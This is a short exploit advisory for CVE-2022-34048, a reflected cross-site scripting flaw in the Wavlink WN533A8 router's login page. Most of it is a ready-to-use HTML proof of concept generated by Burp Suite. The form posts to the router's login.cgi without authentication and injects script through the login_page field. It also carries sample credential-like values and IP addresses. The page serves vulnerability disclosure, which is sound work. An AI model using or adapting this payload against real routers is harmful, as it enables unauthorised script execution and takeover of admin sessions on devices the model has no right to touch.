Headline
Wavlink WN533A8 Cross Site Scripting
Wavlink WN533A8 suffers from a cross site scripting vulnerability.
# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: M33A8.V5030.190716# Vendor home page : wavlink.com# Authentication Required: No# CVE : CVE-2022-34048# Tested on: Windows# Poc code<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST"> <input type="hidden" name="newUI" value="1" /> <input type="hidden" name="page" value="login" /> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="langChange" value="0" /> <input type="hidden" name="ipaddr" value="196.219.234.10" /> <input type="hidden" name="login_page" value="x");alert(9);x=("" /> <input type="hidden" name="homepage" value="main.shtml" /> <input type="hidden" name="sysinitpage" value="sysinit.shtml" /> <input type="hidden" name="wizardpage" value="wiz.shtml" /> <input type="hidden" name="hostname" value="59.148.80.138" /> <input type="hidden" name="key" value="M94947765" /> <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" /> <input type="hidden" name="lang_select" value="en" /> <input type="submit" value="Submit request" /> </form> </body></html>
Related news
CVE-2022-34048
Wavlink WN533A8 M33A8.V5030.190716 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the login_page parameter.